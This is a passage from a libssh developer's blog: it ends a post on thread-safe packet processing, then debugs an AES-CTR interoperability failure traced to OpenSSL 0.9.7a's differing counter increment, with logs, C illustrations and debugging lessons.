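Here is a hedged sketch of that third option, reusing the hypothetical session, read_packet() and dispatch_packet() stand-ins from the earlier sketch (again, not the real libssh API). ProcessInput evaluates the caller’s predicate right after taking the lock and skips the blocking read if another thread already did the work:

/* Predicate type: returns nonzero once the caller's wanted state is reached. */
typedef int (*done_cb)(struct session *s);

static void ProcessInput_cb(struct session *s, done_cb check_done)
{
    pthread_mutex_lock(&s->lock);
    if (check_done(s)) {                 /* another thread did the work      */
        pthread_mutex_unlock(&s->lock);
        return;
    }
    int packet_type = read_packet(s);    /* only block if still needed       */
    dispatch_packet(s, packet_type);
    pthread_mutex_unlock(&s->lock);
}

/* The same predicate doubles as the loop termination condition in thread Y: */
static int check_y(struct session *s)
{
    return s->state == STATE_Y;
}

static void wait_for_state_y(struct session *s)
{
    while (!check_y(s))
        ProcessInput_cb(s, check_y);
}

The price is that every caller must expose its termination condition to ProcessInput, which is exactly the coupling mentioned above.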

What’s your opinion? Feel free to comment!

Aris

Debugging a cryptographic bug in libssh…

Hey there, you may know I am a developer of the SSH library libssh. Last week, a post on the libssh mailing list reported a connection problem under Red Hat RHEL 4.8. It seemed that the new cipher aes128-ctr, recently implemented in libssh, had a little problem…

This bug looked strange, firstly because we had never had any cryptographic problems within libssh, and secondly because the debug output did not report anything broken:

[3] Set output algorithm to aes256-ctr
[3] Set input algorithm to aes256-ctr

[3] Writing on the wire a packet having 17 bytes before
[3] 17 bytes after comp + 10 padding bytes = 28 bytes packet
[3] Encrypting packet with seq num: 3, len: 32
[3] Sent SSH_MSG_SERVICE_REQUEST (service ssh-userauth)
[3] Decrypting 16 bytes
[3] Packet size decrypted: 44 (0x2c)
[3] Read a 44 bytes packet
[3] Decrypting 32 bytes
2010-04-12 13:14:54,211557; 1126189408 procSrvAuth; Did not receive SERVICE_ACCEPT

While the OpenSSH side was saying:

sshd[22341]: debug1: SSH2_MSG_NEWKEYS sent
sshd[22341]: debug1: expecting SSH2_MSG_NEWKEYS
sshd[22341]: debug1: SSH2_MSG_NEWKEYS received
sshd[22341]: debug1: KEX done
sshd[22341]: Disconnecting: Corrupted MAC on input.

What does this mean?

libssh was sending garbage and was receiving some kind of garbage back (a variation of the last error showed an HMAC error). However, the “size” field of the SSH packet (the first 32 bits of every packet) was consistent with the type of packet being received. So what?
Further analysis of the received plaintext on both the OpenSSH and libssh sides showed that the first 16 bytes of the first packet in each direction were correct. So this was a bug affecting the whole stream except the first block of blocksize bytes. The code in libssh producing aes128-ctr is the following:

static void aes_ctr128_encrypt(struct crypto_struct *cipher, void *in, void *out,
    unsigned long len, void *IV) {
  unsigned char tmp_buffer[128/8];
  unsigned int num=0;
  /* Some things are special with ctr128:
   * tmp_buffer is not really used here, because it is only needed to store
   * temporary data when an encryption is made on lengths that are not a
   * multiple of the blocksize. Same for num, which stores the current offset
   * within the block in the CTR function.
   */
  AES_ctr128_encrypt(in, out, len, cipher->key, IV, tmp_buffer, &num);
}

Then, how does AES-CTR work?

CTR is a stream cipher mode built on top of a block cipher. In SSH, it’s used like a block cipher anyway. It has two interesting characteristics:

  • The same code is used for encryption and decryption, because it produces an OTP-like stream of bytes
  • The key is used only for the block cipher encryption, and the input to the algorithm is a nonce together with a counter

That’s where things begin to get interesting. In our code, IV is used as the nonce and is generated from the cryptographic parameters during the key exchange. I verified that its initial value was consistent with the valid (working) implementation. tmp_buffer is a buffer used for internal operations of the cipher; it’s normally not important. The num variable is used to report how far we are in the encryption of the current block, in order to emulate a stream cipher. We do not use this feature (SSH always encrypts packets that are a multiple of the blocksize), so the returned value is always 0.
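
To illustrate how CTR mode works, here is a minimal, self-contained sketch with a toy “cipher” standing in for AES (this is not the libssh code): the block cipher encrypts the nonce/counter block to produce a keystream, the data is XORed with that keystream, and the counter is incremented for every block:

#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BLOCKSIZE 16

/* Placeholder for AES under the session key -- NOT a real cipher. */
static void toy_encrypt(const uint8_t in[BLOCKSIZE], uint8_t out[BLOCKSIZE])
{
    for (int i = 0; i < BLOCKSIZE; i++)
        out[i] = in[i] ^ 0xA5;
}

/* Big-endian increment of the full 128-bit counter by 1. */
static void ctr_inc(uint8_t counter[BLOCKSIZE])
{
    for (int i = BLOCKSIZE - 1; i >= 0; i--)
        if (++counter[i] != 0)
            break;
}

/* The same routine encrypts and decrypts: it just XORs the keystream in. */
static void ctr_crypt(uint8_t *data, size_t len, uint8_t counter[BLOCKSIZE])
{
    uint8_t keystream[BLOCKSIZE];
    for (size_t off = 0; off < len; off += BLOCKSIZE) {
        toy_encrypt(counter, keystream);          /* E_k(nonce || counter)   */
        for (size_t i = 0; i < BLOCKSIZE && off + i < len; i++)
            data[off + i] ^= keystream[i];
        ctr_inc(counter);                         /* next block, next counter */
    }
}

int main(void)
{
    uint8_t iv[BLOCKSIZE] = {0}, ctr[BLOCKSIZE];
    uint8_t msg[32] = "attack at dawn, attack at dawn!";

    memcpy(ctr, iv, BLOCKSIZE);
    ctr_crypt(msg, sizeof(msg), ctr);             /* encrypt                  */
    memcpy(ctr, iv, BLOCKSIZE);
    ctr_crypt(msg, sizeof(msg), ctr);             /* decrypt (same function)  */
    printf("%s\n", msg);
    return 0;
}

Both sides only stay in sync as long as they increment the counter the same way, which is exactly where the bug hides.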

So now, how come libssh with OpenSSL 0.9.8 on my desktop and OpenSSH on RHEL 4.8 work together like a charm, while libssh with OpenSSL 0.9.7a on RHEL/CentOS 4.8 does not?

I had to go one step further and look at what could be wrong in the way I was using the AES_ctr128_encrypt function. I looked at the code of OpenSSL 0.9.8 and found this:

/* increment counter (128-bit int) by 1 */
static void AES_ctr128_inc(unsigned char *counter) {
  unsigned long c;

  /* Grab bottom dword of counter and increment */
  c = GETU32(counter + 12);
  c++; c &= 0xFFFFFFFF;
  [...]

This is the code used to increment the counter. And now the surprise in the sources of OpenSSL 0.9.7a:

/* increment counter (128-bit int) by 2^64 */
static void AES_ctr128_inc(unsigned char *counter) {
  unsigned long c;

  /* Grab 3rd dword of counter and increment */
#ifdef L_ENDIAN
  c = GETU32(counter + 8);
  [...]

What does that mean? It means that the counter incrementation is not the same between the two versions of AES-CTR128! OpenSSL shipped both a broken and a correct implementation of AES-CTR128. The CVS commit fixing this dates back to 2003, and I found that OpenSSL 0.9.7c fixes the issue. Of course, no documentation explains that difference, and nothing in the header files lets you know whether you’re in front of a broken or a working implementation (I would have expected a #define in the working version).
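
To visualize the difference, here is a simplified illustration based on the two snippets above (not the actual OpenSSL code), assuming a big-endian 128-bit counter: the fixed version increments the last 32-bit word (bytes 12..15), while 0.9.7a increments the word at offset 8, i.e. it adds 2^64:

#include <stdio.h>

static void inc_bottom_dword(unsigned char counter[16])   /* 0.9.8: +1     */
{
    for (int i = 15; i >= 12; i--)
        if (++counter[i] != 0)
            break;
}

static void inc_third_dword(unsigned char counter[16])    /* 0.9.7a: +2^64 */
{
    for (int i = 11; i >= 8; i--)
        if (++counter[i] != 0)
            break;
}

int main(void)
{
    unsigned char a[16] = {0};
    unsigned char b[16] = {0};

    inc_bottom_dword(a);
    inc_third_dword(b);

    for (int i = 0; i < 16; i++)
        printf("%02x", a[i]);
    printf("  <- counter after one block with 0.9.8\n");

    for (int i = 0; i < 16; i++)
        printf("%02x", b[i]);
    printf("  <- counter after one block with 0.9.7a\n");

    /* From the second block onward the two sides feed different counter
     * values to AES, so the keystreams diverge right after the first
     * 16 bytes -- exactly what was observed on the wire. */
    return 0;
}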

By studying the sources of OpenSSH, I found that they were not affected by the bug because they implemented the CTR mode on their own. Not wanting to do that, I simply deactivated the compilation of the CTR algorithms in libssh when built against a broken OpenSSL. Yep, “Fixed!”.
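
For the curious, a minimal sketch of how such a compile-time switch could look; this is illustrative, not the actual libssh patch, and it assumes the usual OPENSSL_VERSION_NUMBER encoding, under which 0.9.7c is 0x0090703fL:

#include <openssl/opensslv.h>

/* Assumption: 0.9.7c is the first release with a correct AES_ctr128_inc();
 * below that, do not register the CTR ciphers at all. */
#if OPENSSL_VERSION_NUMBER >= 0x0090703fL
#define HAVE_WORKING_AES_CTR 1
#else
#define HAVE_WORKING_AES_CTR 0
#endif

#if HAVE_WORKING_AES_CTR
/* register aes128-ctr, aes192-ctr and aes256-ctr in the cipher table */
#else
/* leave the CTR ciphers out; the peers will negotiate another mode (e.g. CBC) */
#endif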

Lessons learned

These things are important when you’re debugging a cryptographic routine that produces garbage:

  • Verify the input. Garbage in, garbage out.
  • Verify derived inputs like the IV. Even a single bit of error can turn the output into garbage.
  • Verify the output. It’s possible that the output of the cryptographic algorithm you’re using is good; it’s just not what the other party is reading and trying to decrypt…
  • Verify you’re using the crypto correctly. When the only doc you have, as with libcrypto, is the header file, then read the source.
  • If all of this did not work… read the source of the crypto and find what the difference is between the working implementation and the broken one. Maybe it’s something you did not understand and used wrongly, maybe …